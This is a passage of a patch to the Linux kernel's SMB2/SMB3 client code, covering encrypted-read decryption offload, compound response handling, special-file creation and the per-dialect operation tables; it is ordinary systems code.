+-	struct work_struct decrypt;
+-	struct TCP_Server_Info *server;
+-	struct page **ppages;
+-	char *buf;
+-	unsigned int npages;
+-	unsigned int len;
+-};
+-
+-
+-static void smb2_decrypt_offload(struct work_struct *work)
+-{
+-	struct smb2_decrypt_work *dw = container_of(work,
+-				struct smb2_decrypt_work, decrypt);
+-	int i, rc;
+-	struct mid_q_entry *mid;
+-
+-	rc = decrypt_raw_data(dw->server, dw->buf, dw->server->vals->read_rsp_size,
+-			      dw->ppages, dw->npages, dw->len, true);
+-	if (rc) {
+-		cifs_dbg(VFS, "error decrypting rc=%d\n", rc);
+-		goto free_pages;
+-	}
+-
+-	dw->server->lstrp = jiffies;
+-	mid = smb2_find_dequeue_mid(dw->server, dw->buf);
+-	if (mid == NULL)
+-		cifs_dbg(FYI, "mid not found\n");
+-	else {
+-		mid->decrypted = true;
+-		rc = handle_read_data(dw->server, mid, dw->buf,
+-				      dw->server->vals->read_rsp_size,
+-				      dw->ppages, dw->npages, dw->len,
+-				      true);
+-		if (rc >= 0) {
+-#ifdef CONFIG_CIFS_STATS2
+-			mid->when_received = jiffies;
+-#endif
+-			if (dw->server->ops->is_network_name_deleted)
+-				dw->server->ops->is_network_name_deleted(dw->buf,
+-									 dw->server);
+-
+-			mid->callback(mid);
+-		} else {
+-			spin_lock(&dw->server->srv_lock);
+-			if (dw->server->tcpStatus == CifsNeedReconnect) {
+-				spin_lock(&dw->server->mid_lock);
+-				mid->mid_state = MID_RETRY_NEEDED;
+-				spin_unlock(&dw->server->mid_lock);
+-				spin_unlock(&dw->server->srv_lock);
+-				mid->callback(mid);
+-			} else {
+-				spin_lock(&dw->server->mid_lock);
+-				mid->mid_state = MID_REQUEST_SUBMITTED;
+-				mid->mid_flags &= ~(MID_DELETED);
+-				list_add_tail(&mid->qhead,
+-					&dw->server->pending_mid_q);
+-				spin_unlock(&dw->server->mid_lock);
+-				spin_unlock(&dw->server->srv_lock);
+-			}
+-		}
+-		release_mid(mid);
+-	}
+-
+-free_pages:
+-	for (i = dw->npages-1; i >= 0; i--)
+-		put_page(dw->ppages[i]);
+-
+-	kfree(dw->ppages);
+-	cifs_small_buf_release(dw->buf);
+-	kfree(dw);
+-}
+-
+-
+-static int
+-receive_encrypted_read(struct TCP_Server_Info *server, struct mid_q_entry **mid,
+-		       int *num_mids)
+-{
+-	char *buf = server->smallbuf;
+-	struct smb2_transform_hdr *tr_hdr = (struct smb2_transform_hdr *)buf;
+-	unsigned int npages;
+-	struct page **pages;
+-	unsigned int len;
+-	unsigned int buflen = server->pdu_size;
+-	int rc;
+-	int i = 0;
+-	struct smb2_decrypt_work *dw;
+-
+-	*num_mids = 1;
+-	len = min_t(unsigned int, buflen, server->vals->read_rsp_size +
+-		sizeof(struct smb2_transform_hdr)) - HEADER_SIZE(server) + 1;
+-
+-	rc = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1, len);
+-	if (rc < 0)
+-		return rc;
+-	server->total_read += rc;
+-
+-	len = le32_to_cpu(tr_hdr->OriginalMessageSize) -
+-		server->vals->read_rsp_size;
+-	npages = DIV_ROUND_UP(len, PAGE_SIZE);
+-
+-	pages = kmalloc_array(npages, sizeof(struct page *), GFP_KERNEL);
+-	if (!pages) {
+-		rc = -ENOMEM;
+-		goto discard_data;
+-	}
+-
+-	for (; i < npages; i++) {
+-		pages[i] = alloc_page(GFP_KERNEL|__GFP_HIGHMEM);
+-		if (!pages[i]) {
+-			rc = -ENOMEM;
+-			goto discard_data;
+-		}
+-	}
+-
+-	/* read the response data into pages */
+-	rc = read_data_into_pages(server, pages, npages, len);
+-	if (rc)
+-		goto free_pages;
+-
+-	rc = cifs_discard_remaining_data(server);
+-	if (rc)
+-		goto free_pages;
+-
+-	/*
+-	 * For large reads, offload decryption to a separate thread for better
+-	 * performance, since decryption is expensive and can use more cores.
+-	 */
+-
+-	if ((server->min_offload) && (server->in_flight > 1) &&
+-	    (server->pdu_size >= server->min_offload)) {
+-		dw = kmalloc(sizeof(struct smb2_decrypt_work), GFP_KERNEL);
+-		if (dw == NULL)
+-			goto non_offloaded_decrypt;
+-
+-		dw->buf = server->smallbuf;
+-		server->smallbuf = (char *)cifs_small_buf_get();
+-
+-		INIT_WORK(&dw->decrypt, smb2_decrypt_offload);
+-
+-		dw->npages = npages;
+-		dw->server = server;
+-		dw->ppages = pages;
+-		dw->len = len;
+-		queue_work(decrypt_wq, &dw->decrypt);
+-		*num_mids = 0; /* worker thread takes care of finding mid */
+-		return -1;
+-	}
+-
+-non_offloaded_decrypt:
+-	rc = decrypt_raw_data(server, buf, server->vals->read_rsp_size,
+-			      pages, npages, len, false);
+-	if (rc)
+-		goto free_pages;
+-
+-	*mid = smb2_find_mid(server, buf);
+-	if (*mid == NULL)
+-		cifs_dbg(FYI, "mid not found\n");
+-	else {
+-		cifs_dbg(FYI, "mid found\n");
+-		(*mid)->decrypted = true;
+-		rc = handle_read_data(server, *mid, buf,
+-				      server->vals->read_rsp_size,
+-				      pages, npages, len, false);
+-		if (rc >= 0) {
+-			if (server->ops->is_network_name_deleted) {
+-				server->ops->is_network_name_deleted(buf,
+-								server);
+-			}
+-		}
+-	}
+-
+-free_pages:
+-	for (i = i - 1; i >= 0; i--)
+-		put_page(pages[i]);
+-	kfree(pages);
+-	return rc;
+-discard_data:
+-	cifs_discard_remaining_data(server);
+-	goto free_pages;
+-}
+-
+-static int
+-receive_encrypted_standard(struct TCP_Server_Info *server,
+-			   struct mid_q_entry **mids, char **bufs,
+-			   int *num_mids)
+-{
+-	int ret, length;
+-	char *buf = server->smallbuf;
+-	struct smb2_hdr *shdr;
+-	unsigned int pdu_length = server->pdu_size;
+-	unsigned int buf_size;
+-	struct mid_q_entry *mid_entry;
+-	int next_is_large;
+-	char *next_buffer = NULL;
+-
+-	*num_mids = 0;
+-
+-	/* switch to large buffer if too big for a small one */
+-	if (pdu_length > MAX_CIFS_SMALL_BUFFER_SIZE) {
+-		server->large_buf = true;
+-		memcpy(server->bigbuf, buf, server->total_read);
+-		buf = server->bigbuf;
+-	}
+-
+-	/* now read the rest */
+-	length = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1,
+-				pdu_length - HEADER_SIZE(server) + 1);
+-	if (length < 0)
+-		return length;
+-	server->total_read += length;
+-
+-	buf_size = pdu_length - sizeof(struct smb2_transform_hdr);
+-	length = decrypt_raw_data(server, buf, buf_size, NULL, 0, 0, false);
+-	if (length)
+-		return length;
+-
+-	next_is_large = server->large_buf;
+-one_more:
+-	shdr = (struct smb2_hdr *)buf;
+-	if (shdr->NextCommand) {
+-		if (next_is_large)
+-			next_buffer = (char *)cifs_buf_get();
+-		else
+-			next_buffer = (char *)cifs_small_buf_get();
+-		memcpy(next_buffer,
+-		       buf + le32_to_cpu(shdr->NextCommand),
+-		       pdu_length - le32_to_cpu(shdr->NextCommand));
+-	}
+-
+-	mid_entry = smb2_find_mid(server, buf);
+-	if (mid_entry == NULL)
+-		cifs_dbg(FYI, "mid not found\n");
+-	else {
+-		cifs_dbg(FYI, "mid found\n");
+-		mid_entry->decrypted = true;
+-		mid_entry->resp_buf_size = server->pdu_size;
+-	}
+-
+-	if (*num_mids >= MAX_COMPOUND) {
+-		cifs_server_dbg(VFS, "too many PDUs in compound\n");
+-		return -1;
+-	}
+-	bufs[*num_mids] = buf;
+-	mids[(*num_mids)++] = mid_entry;
+-
+-	if (mid_entry && mid_entry->handle)
+-		ret = mid_entry->handle(server, mid_entry);
+-	else
+-		ret = cifs_handle_standard(server, mid_entry);
+-
+-	if (ret == 0 && shdr->NextCommand) {
+-		pdu_length -= le32_to_cpu(shdr->NextCommand);
+-		server->large_buf = next_is_large;
+-		if (next_is_large)
+-			server->bigbuf = buf = next_buffer;
+-		else
+-			server->smallbuf = buf = next_buffer;
+-		goto one_more;
+-	} else if (ret != 0) {
+-		/*
+-		 * ret != 0 here means that we didn't get to handle_mid() thus
+-		 * server->smallbuf and server->bigbuf are still valid. We need
+-		 * to free next_buffer because it is not going to be used
+-		 * anywhere.
+-		 */
+-		if (next_is_large)
+-			free_rsp_buf(CIFS_LARGE_BUFFER, next_buffer);
+-		else
+-			free_rsp_buf(CIFS_SMALL_BUFFER, next_buffer);
+-	}
+-
+-	return ret;
+-}
+-
+-static int
+-smb3_receive_transform(struct TCP_Server_Info *server,
+-		       struct mid_q_entry **mids, char **bufs, int *num_mids)
+-{
+-	char *buf = server->smallbuf;
+-	unsigned int pdu_length = server->pdu_size;
+-	struct smb2_transform_hdr *tr_hdr = (struct smb2_transform_hdr *)buf;
+-	unsigned int orig_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
+-
+-	if (pdu_length < sizeof(struct smb2_transform_hdr) +
+-						sizeof(struct smb2_hdr)) {
+-		cifs_server_dbg(VFS, "Transform message is too small (%u)\n",
+-			 pdu_length);
+-		cifs_reconnect(server, true);
+-		return -ECONNABORTED;
+-	}
+-
+-	if (pdu_length < orig_len + sizeof(struct smb2_transform_hdr)) {
+-		cifs_server_dbg(VFS, "Transform message is broken\n");
+-		cifs_reconnect(server, true);
+-		return -ECONNABORTED;
+-	}
+-
+-	/* TODO: add support for compounds containing READ. */
+-	if (pdu_length > CIFSMaxBufSize + MAX_HEADER_SIZE(server)) {
+-		return receive_encrypted_read(server, &mids[0], num_mids);
+-	}
+-
+-	return receive_encrypted_standard(server, mids, bufs, num_mids);
+-}
+-
+-int
+-smb3_handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid)
+-{
+-	char *buf = server->large_buf ? server->bigbuf : server->smallbuf;
+-
+-	return handle_read_data(server, mid, buf, server->pdu_size,
+-				NULL, 0, 0, false);
+-}
+-
+-static int
+-smb2_next_header(char *buf)
+-{
+-	struct smb2_hdr *hdr = (struct smb2_hdr *)buf;
+-	struct smb2_transform_hdr *t_hdr = (struct smb2_transform_hdr *)buf;
+-
+-	if (hdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM)
+-		return sizeof(struct smb2_transform_hdr) +
+-		  le32_to_cpu(t_hdr->OriginalMessageSize);
+-
+-	return le32_to_cpu(hdr->NextCommand);
+-}
+-
+-static int
+-smb2_make_node(unsigned int xid, struct inode *inode,
+-	       struct dentry *dentry, struct cifs_tcon *tcon,
+-	       const char *full_path, umode_t mode, dev_t dev)
+-{
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	int rc = -EPERM;
+-	struct cifs_open_info_data buf = {};
+-	struct cifs_io_parms io_parms = {0};
+-	__u32 oplock = 0;
+-	struct cifs_fid fid;
+-	struct cifs_open_parms oparms;
+-	unsigned int bytes_written;
+-	struct win_dev *pdev;
+-	struct kvec iov[2];
+-
+-	/*
+-	 * Check if mounted with the 'sfu' mount option.
+-	 * SFU emulation should work with all servers, but only
+-	 * supports block and char devices (no socket & fifo),
+-	 * and was used by default in earlier versions of Windows
+-	 */
+-	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
+-		return rc;
+-
+-	/*
+-	 * TODO: Add ability to create instead via reparse point. Windows (e.g.
+-	 * their current NFS server) uses this approach to expose special files
+-	 * over SMB2/SMB3 and Samba will do this with SMB3.1.1 POSIX Extensions
+-	 */
+-
+-	if (!S_ISCHR(mode) && !S_ISBLK(mode))
+-		return rc;
+-
+-	cifs_dbg(FYI, "sfu compat create special file\n");
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.cifs_sb = cifs_sb,
+-		.desired_access = GENERIC_WRITE,
+-		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
+-						      CREATE_OPTION_SPECIAL),
+-		.disposition = FILE_CREATE,
+-		.path = full_path,
+-		.fid = &fid,
+-	};
+-
+-	if (tcon->ses->server->oplocks)
+-		oplock = REQ_OPLOCK;
+-	else
+-		oplock = 0;
+-	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
+-	if (rc)
+-		return rc;
+-
+-	/*
+-	 * BB Do not bother to decode buf since no local inode yet to put
+-	 * timestamps in, but we can reuse it safely.
+-	 */
+-
+-	pdev = (struct win_dev *)&buf.fi;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.offset = 0;
+-	io_parms.length = sizeof(struct win_dev);
+-	iov[1].iov_base = &buf.fi;
+-	iov[1].iov_len = sizeof(struct win_dev);
+-	if (S_ISCHR(mode)) {
+-		memcpy(pdev->type, "IntxCHR", 8);
+-		pdev->major = cpu_to_le64(MAJOR(dev));
+-		pdev->minor = cpu_to_le64(MINOR(dev));
+-		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+-							&bytes_written, iov, 1);
+-	} else if (S_ISBLK(mode)) {
+-		memcpy(pdev->type, "IntxBLK", 8);
+-		pdev->major = cpu_to_le64(MAJOR(dev));
+-		pdev->minor = cpu_to_le64(MINOR(dev));
+-		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
+-							&bytes_written, iov, 1);
+-	}
+-	tcon->ses->server->ops->close(xid, tcon, &fid);
+-	d_drop(dentry);
+-
+-	/* FIXME: add code here to set EAs */
+-
+-	cifs_free_open_info(&buf);
+-	return rc;
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-struct smb_version_operations smb20_operations = {
+-	.compare_fids = smb2_compare_fids,
+-	.setup_request = smb2_setup_request,
+-	.setup_async_request = smb2_setup_async_request,
+-	.check_receive = smb2_check_receive,
+-	.add_credits = smb2_add_credits,
+-	.set_credits = smb2_set_credits,
+-	.get_credits_field = smb2_get_credits_field,
+-	.get_credits = smb2_get_credits,
+-	.wait_mtu_credits = cifs_wait_mtu_credits,
+-	.get_next_mid = smb2_get_next_mid,
+-	.revert_current_mid = smb2_revert_current_mid,
+-	.read_data_offset = smb2_read_data_offset,
+-	.read_data_length = smb2_read_data_length,
+-	.map_error = map_smb2_to_linux_error,
+-	.find_mid = smb2_find_mid,
+-	.check_message = smb2_check_message,
+-	.dump_detail = smb2_dump_detail,
+-	.clear_stats = smb2_clear_stats,
+-	.print_stats = smb2_print_stats,
+-	.is_oplock_break = smb2_is_valid_oplock_break,
+-	.handle_cancelled_mid = smb2_handle_cancelled_mid,
+-	.downgrade_oplock = smb2_downgrade_oplock,
+-	.need_neg = smb2_need_neg,
+-	.negotiate = smb2_negotiate,
+-	.negotiate_wsize = smb2_negotiate_wsize,
+-	.negotiate_rsize = smb2_negotiate_rsize,
+-	.sess_setup = SMB2_sess_setup,
+-	.logoff = SMB2_logoff,
+-	.tree_connect = SMB2_tcon,
+-	.tree_disconnect = SMB2_tdis,
+-	.qfs_tcon = smb2_qfs_tcon,
+-	.is_path_accessible = smb2_is_path_accessible,
+-	.can_echo = smb2_can_echo,
+-	.echo = SMB2_echo,
+-	.query_path_info = smb2_query_path_info,
+-	.get_srv_inum = smb2_get_srv_inum,
+-	.query_file_info = smb2_query_file_info,
+-	.set_path_size = smb2_set_path_size,
+-	.set_file_size = smb2_set_file_size,
+-	.set_file_info = smb2_set_file_info,
+-	.set_compression = smb2_set_compression,
+-	.mkdir = smb2_mkdir,
+-	.mkdir_setinfo = smb2_mkdir_setinfo,
+-	.rmdir = smb2_rmdir,
+-	.unlink = smb2_unlink,
+-	.rename = smb2_rename_path,
+-	.create_hardlink = smb2_create_hardlink,
+-	.query_symlink = smb2_query_symlink,
+-	.query_mf_symlink = smb3_query_mf_symlink,
+-	.create_mf_symlink = smb3_create_mf_symlink,
+-	.open = smb2_open_file,
+-	.set_fid = smb2_set_fid,
+-	.close = smb2_close_file,
+-	.flush = smb2_flush_file,
+-	.async_readv = smb2_async_readv,
+-	.async_writev = smb2_async_writev,
+-	.sync_read = smb2_sync_read,
+-	.sync_write = smb2_sync_write,
+-	.query_dir_first = smb2_query_dir_first,
+-	.query_dir_next = smb2_query_dir_next,
+-	.close_dir = smb2_close_dir,
+-	.calc_smb_size = smb2_calc_size,
+-	.is_status_pending = smb2_is_status_pending,
+-	.is_session_expired = smb2_is_session_expired,
+-	.oplock_response = smb2_oplock_response,
+-	.queryfs = smb2_queryfs,
+-	.mand_lock = smb2_mand_lock,
+-	.mand_unlock_range = smb2_unlock_range,
+-	.push_mand_locks = smb2_push_mandatory_locks,
+-	.get_lease_key = smb2_get_lease_key,
+-	.set_lease_key = smb2_set_lease_key,
+-	.new_lease_key = smb2_new_lease_key,
+-	.calc_signature = smb2_calc_signature,
+-	.is_read_op = smb2_is_read_op,
+-	.set_oplock_level = smb2_set_oplock_level,
+-	.create_lease_buf = smb2_create_lease_buf,
+-	.parse_lease_buf = smb2_parse_lease_buf,
+-	.copychunk_range = smb2_copychunk_range,
+-	.wp_retry_size = smb2_wp_retry_size,
+-	.dir_needs_close = smb2_dir_needs_close,
+-	.get_dfs_refer = smb2_get_dfs_refer,
+-	.select_sectype = smb2_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = smb2_query_eas,
+-	.set_EA = smb2_set_ea,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_smb2_acl,
+-	.get_acl_by_fid = get_smb2_acl_by_fid,
+-	.set_acl = set_smb2_acl,
+-	.next_header = smb2_next_header,
+-	.ioctl_query_info = smb2_ioctl_query_info,
+-	.make_node = smb2_make_node,
+-	.fiemap = smb3_fiemap,
+-	.llseek = smb3_llseek,
+-	.is_status_io_timeout = smb2_is_status_io_timeout,
+-	.is_network_name_deleted = smb2_is_network_name_deleted,
+-};
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-
+-struct smb_version_operations smb21_operations = {
+-	.compare_fids = smb2_compare_fids,
+-	.setup_request = smb2_setup_request,
+-	.setup_async_request = smb2_setup_async_request,
+-	.check_receive = smb2_check_receive,
+-	.add_credits = smb2_add_credits,
+-	.set_credits = smb2_set_credits,
+-	.get_credits_field = smb2_get_credits_field,
+-	.get_credits = smb2_get_credits,
+-	.wait_mtu_credits = smb2_wait_mtu_credits,
+-	.adjust_credits = smb2_adjust_credits,
+-	.get_next_mid = smb2_get_next_mid,
+-	.revert_current_mid = smb2_revert_current_mid,
+-	.read_data_offset = smb2_read_data_offset,
+-	.read_data_length = smb2_read_data_length,
+-	.map_error = map_smb2_to_linux_error,
+-	.find_mid = smb2_find_mid,
+-	.check_message = smb2_check_message,
+-	.dump_detail = smb2_dump_detail,
+-	.clear_stats = smb2_clear_stats,
+-	.print_stats = smb2_print_stats,
+-	.is_oplock_break = smb2_is_valid_oplock_break,
+-	.handle_cancelled_mid = smb2_handle_cancelled_mid,
+-	.downgrade_oplock = smb2_downgrade_oplock,
+-	.need_neg = smb2_need_neg,
+-	.negotiate = smb2_negotiate,
+-	.negotiate_wsize = smb2_negotiate_wsize,
+-	.negotiate_rsize = smb2_negotiate_rsize,
+-	.sess_setup = SMB2_sess_setup,
+-	.logoff = SMB2_logoff,
+-	.tree_connect = SMB2_tcon,
+-	.tree_disconnect = SMB2_tdis,
+-	.qfs_tcon = smb2_qfs_tcon,
+-	.is_path_accessible = smb2_is_path_accessible,
+-	.can_echo = smb2_can_echo,
+-	.echo = SMB2_echo,
+-	.query_path_info = smb2_query_path_info,
+-	.get_srv_inum = smb2_get_srv_inum,
+-	.query_file_info = smb2_query_file_info,
+-	.set_path_size = smb2_set_path_size,
+-	.set_file_size = smb2_set_file_size,
+-	.set_file_info = smb2_set_file_info,
+-	.set_compression = smb2_set_compression,
+-	.mkdir = smb2_mkdir,
+-	.mkdir_setinfo = smb2_mkdir_setinfo,
+-	.rmdir = smb2_rmdir,
+-	.unlink = smb2_unlink,
+-	.rename = smb2_rename_path,
+-	.create_hardlink = smb2_create_hardlink,
+-	.query_symlink = smb2_query_symlink,
+-	.query_mf_symlink = smb3_query_mf_symlink,
+-	.create_mf_symlink = smb3_create_mf_symlink,
+-	.open = smb2_open_file,
+-	.set_fid = smb2_set_fid,
+-	.close = smb2_close_file,
+-	.flush = smb2_flush_file,
+-	.async_readv = smb2_async_readv,
+-	.async_writev = smb2_async_writev,
+-	.sync_read = smb2_sync_read,
+-	.sync_write = smb2_sync_write,
+-	.query_dir_first = smb2_query_dir_first,
+-	.query_dir_next = smb2_query_dir_next,
+-	.close_dir = smb2_close_dir,
+-	.calc_smb_size = smb2_calc_size,
+-	.is_status_pending = smb2_is_status_pending,
+-	.is_session_expired = smb2_is_session_expired,
+-	.oplock_response = smb2_oplock_response,
+-	.queryfs = smb2_queryfs,
+-	.mand_lock = smb2_mand_lock,
+-	.mand_unlock_range = smb2_unlock_range,
+-	.push_mand_locks = smb2_push_mandatory_locks,
+-	.get_lease_key = smb2_get_lease_key,
+-	.set_lease_key = smb2_set_lease_key,
+-	.new_lease_key = smb2_new_lease_key,
+-	.calc_signature = smb2_calc_signature,
+-	.is_read_op = smb21_is_read_op,
+-	.set_oplock_level = smb21_set_oplock_level,
+-	.create_lease_buf = smb2_create_lease_buf,
+-	.parse_lease_buf = smb2_parse_lease_buf,
+-	.copychunk_range = smb2_copychunk_range,
+-	.wp_retry_size = smb2_wp_retry_size,
+-	.dir_needs_close = smb2_dir_needs_close,
+-	.enum_snapshots = smb3_enum_snapshots,
+-	.notify = smb3_notify,
+-	.get_dfs_refer = smb2_get_dfs_refer,
+-	.select_sectype = smb2_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = smb2_query_eas,
+-	.set_EA = smb2_set_ea,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_smb2_acl,
+-	.get_acl_by_fid = get_smb2_acl_by_fid,
+-	.set_acl = set_smb2_acl,
+-	.next_header = smb2_next_header,
+-	.ioctl_query_info = smb2_ioctl_query_info,
+-	.make_node = smb2_make_node,
+-	.fiemap = smb3_fiemap,
+-	.llseek = smb3_llseek,
+-	.is_status_io_timeout = smb2_is_status_io_timeout,
+-	.is_network_name_deleted = smb2_is_network_name_deleted,
+-};
+-
+-struct smb_version_operations smb30_operations = {
+-	.compare_fids = smb2_compare_fids,
+-	.setup_request = smb2_setup_request,
+-	.setup_async_request = smb2_setup_async_request,
+-	.check_receive = smb2_check_receive,
+-	.add_credits = smb2_add_credits,
+-	.set_credits = smb2_set_credits,
+-	.get_credits_field = smb2_get_credits_field,
+-	.get_credits = smb2_get_credits,
+-	.wait_mtu_credits = smb2_wait_mtu_credits,
+-	.adjust_credits = smb2_adjust_credits,
+-	.get_next_mid = smb2_get_next_mid,
+-	.revert_current_mid = smb2_revert_current_mid,
+-	.read_data_offset = smb2_read_data_offset,
+-	.read_data_length = smb2_read_data_length,
+-	.map_error = map_smb2_to_linux_error,
+-	.find_mid = smb2_find_mid,
+-	.check_message = smb2_check_message,
+-	.dump_detail = smb2_dump_detail,
+-	.clear_stats = smb2_clear_stats,
+-	.print_stats = smb2_print_stats,
+-	.dump_share_caps = smb2_dump_share_caps,
+-	.is_oplock_break = smb2_is_valid_oplock_break,
+-	.handle_cancelled_mid = smb2_handle_cancelled_mid,
+-	.downgrade_oplock = smb3_downgrade_oplock,
+-	.need_neg = smb2_need_neg,
+-	.negotiate = smb2_negotiate,
+-	.negotiate_wsize = smb3_negotiate_wsize,
+-	.negotiate_rsize = smb3_negotiate_rsize,
+-	.sess_setup = SMB2_sess_setup,
+-	.logoff = SMB2_logoff,
+-	.tree_connect = SMB2_tcon,
+-	.tree_disconnect = SMB2_tdis,
+-	.qfs_tcon = smb3_qfs_tcon,
+-	.is_path_accessible = smb2_is_path_accessible,
+-	.can_echo = smb2_can_echo,
+-	.echo = SMB2_echo,
+-	.query_path_info = smb2_query_path_info,
+-	/* WSL tags introduced long after smb2.1, enable for SMB3, 3.11 only */
+-	.query_reparse_tag = smb2_query_reparse_tag,
+-	.get_srv_inum = smb2_get_srv_inum,
+-	.query_file_info = smb2_query_file_info,
+-	.set_path_size = smb2_set_path_size,
+-	.set_file_size = smb2_set_file_size,
+-	.set_file_info = smb2_set_file_info,
+-	.set_compression = smb2_set_compression,
+-	.mkdir = smb2_mkdir,
+-	.mkdir_setinfo = smb2_mkdir_setinfo,
+-	.rmdir = smb2_rmdir,
+-	.unlink = smb2_unlink,
+-	.rename = smb2_rename_path,
+-	.create_hardlink = smb2_create_hardlink,
+-	.query_symlink = smb2_query_symlink,
+-	.query_mf_symlink = smb3_query_mf_symlink,
+-	.create_mf_symlink = smb3_create_mf_symlink,
+-	.open = smb2_open_file,
+-	.set_fid = smb2_set_fid,
+-	.close = smb2_close_file,
+-	.close_getattr = smb2_close_getattr,
+-	.flush = smb2_flush_file,
+-	.async_readv = smb2_async_readv,
+-	.async_writev = smb2_async_writev,
+-	.sync_read = smb2_sync_read,
+-	.sync_write = smb2_sync_write,
+-	.query_dir_first = smb2_query_dir_first,
+-	.query_dir_next = smb2_query_dir_next,
+-	.close_dir = smb2_close_dir,
+-	.calc_smb_size = smb2_calc_size,
+-	.is_status_pending = smb2_is_status_pending,
+-	.is_session_expired = smb2_is_session_expired,
+-	.oplock_response = smb2_oplock_response,
+-	.queryfs = smb2_queryfs,
+-	.mand_lock = smb2_mand_lock,
+-	.mand_unlock_range = smb2_unlock_range,
+-	.push_mand_locks = smb2_push_mandatory_locks,
+-	.get_lease_key = smb2_get_lease_key,
+-	.set_lease_key = smb2_set_lease_key,
+-	.new_lease_key = smb2_new_lease_key,
+-	.generate_signingkey = generate_smb30signingkey,
+-	.calc_signature = smb3_calc_signature,
+-	.set_integrity  = smb3_set_integrity,
+-	.is_read_op = smb21_is_read_op,
+-	.set_oplock_level = smb3_set_oplock_level,
+-	.create_lease_buf = smb3_create_lease_buf,
+-	.parse_lease_buf = smb3_parse_lease_buf,
+-	.copychunk_range = smb2_copychunk_range,
+-	.duplicate_extents = smb2_duplicate_extents,
+-	.validate_negotiate = smb3_validate_negotiate,
+-	.wp_retry_size = smb2_wp_retry_size,
+-	.dir_needs_close = smb2_dir_needs_close,
+-	.fallocate = smb3_fallocate,
+-	.enum_snapshots = smb3_enum_snapshots,
+-	.notify = smb3_notify,
+-	.init_transform_rq = smb3_init_transform_rq,
+-	.is_transform_hdr = smb3_is_transform_hdr,
+-	.receive_transform = smb3_receive_transform,
+-	.get_dfs_refer = smb2_get_dfs_refer,
+-	.select_sectype = smb2_select_sectype,
+-#ifdef CONFIG_CIFS_XATTR
+-	.query_all_EAs = smb2_query_eas,
+-	.set_EA = smb2_set_ea,
+-#endif /* CIFS_XATTR */
+-	.get_acl = get_smb2_acl,
+-	.get_acl_by_fid = get_smb2_acl_by_fid,
+-	.set_acl = set_smb2_acl,
+-	.next_header = smb2_next_header,
+-	.ioctl_query_info = smb2_ioctl_query_info,
+-	.make_node = smb2_make_node,
+-	.fiemap = smb3_fiemap,
+-	.llseek = smb3_llseek,
+-	.is_status_io_timeout = smb2_is_status_io_timeout,
+-	.is_network_name_deleted = smb2_is_network_name_deleted,
+-};
+-
+-struct smb_version_operations smb311_operations = {
+-	.compare_fids = smb2_compare_fids,
+-	.setup_request = smb2_setup_request,
+-	.setup_async_request = smb2_setup_async_request,
+-	.check_receive = smb2_check_receive,
+-	.add_credits = smb2_add_credits,
+-	.set_credits = smb2_set_credits,
+-	.get_credits_field = smb2_get_credits_field,
+-	.get_credits = smb2_get_credits,
+-	.wait_mtu_credits = smb2_wait_mtu_credits,
+-	.adjust_credits = smb2_adjust_credits,
+-	.get_next_mid = smb2_get_next_mid,
+-	.revert_current_mid = smb2_revert_current_mid,
+-	.read_data_offset = smb2_read_data_offset,
+-	.read_data_length = smb2_read_data_length,
+-	.map_error = map_smb2_to_linux_error,
+-	.find_mid = smb2_find_mid,
+-	.check_message = smb2_check_message,
+-	.dump_detail = smb2_dump_detail,
+-	.clear_stats = smb2_clear_stats,
+-	.print_stats = smb2_print_stats,
+-	.dump_share_caps = smb2_dump_share_caps,
+-	.is_oplock_break = smb2_is_valid_oplock_break,
+-	.handle_cancelled_mid = smb2_handle_cancelled_mid,
+-	.downgrade_oplock = smb3_downgrade_oplock,
+-	.need_neg = smb2_need_neg,
+-	.negotiate = smb2_negotiate,
+-	.negotiate_wsize = smb3_negotiate_wsize,
+-	.negotiate_rsize = smb3_negotiate_rsize,
+-	.sess_setup = SMB2_sess_setup,
+-	.logoff = SMB2_logoff,
+-	.tree_connect = SMB2_tcon,
+-	.tree_disconnect = SMB2_tdis,
+-	.qfs_tcon = smb3_qfs_tcon,
+-	.is_path_accessible = smb2_is_path_accessible,
+-	.can_echo = smb2_can_echo,
+-	.echo = SMB2_echo,
+-	.query_path_info = smb2_query_path_info,
+-	.query_reparse_tag = smb2_query_reparse_tag,
+-	.get_srv_inum = smb2_get_srv_inum,
+-	.query_file_info = smb2_query_file_info,
+-	.set_path_size = smb2_set_path_size,
+-	.set_file_size = smb2_set_file_size,
+-	.set_file_info = smb2_set_file_info,
+-	.set_compression = smb2_set_compression,
+-	.mkdir = smb2_mkdir,
+-	.mkdir_setinfo = smb2_mkdir_setinfo,
+-	.posix_mkdir = smb311_posix_mkdir,
+-	.rmdir = smb2_rmdir,
+-	.unlink = smb2_unlink,
+-	.rename = smb2_rename_path,
+-	.create_hardlink = smb2_create_hardlink,
+-	.query_symlink = smb2_query_symlink,
+-	.query_mf_symlink = smb3_query_mf_symlink,
+-	.create_mf_symlink = smb3_create_mf_symlink,
+-	.open = smb2_open_file,
+-	.set_fid = smb2_set_fid,
+-	.close = smb2_close_file,
+-	.close_getattr = smb2_close_getattr,
+-	.flush = smb2_flush_file,
+-	.async_readv = smb2_async_readv,
+-	.async_writev = smb2_async_writev,
+-	.sync_read = smb2_sync_read,
+-	.sync_write = smb2_sync_write,
+-	.query_dir_first = smb2_query_dir_first,
+-	.query_dir_next = smb2_query_dir_next,
+-	.close_dir = smb2_close_dir,
+-	.calc_smb_size = smb2_calc_size,
+-	.is_status_pending = smb2_is_status_pending,
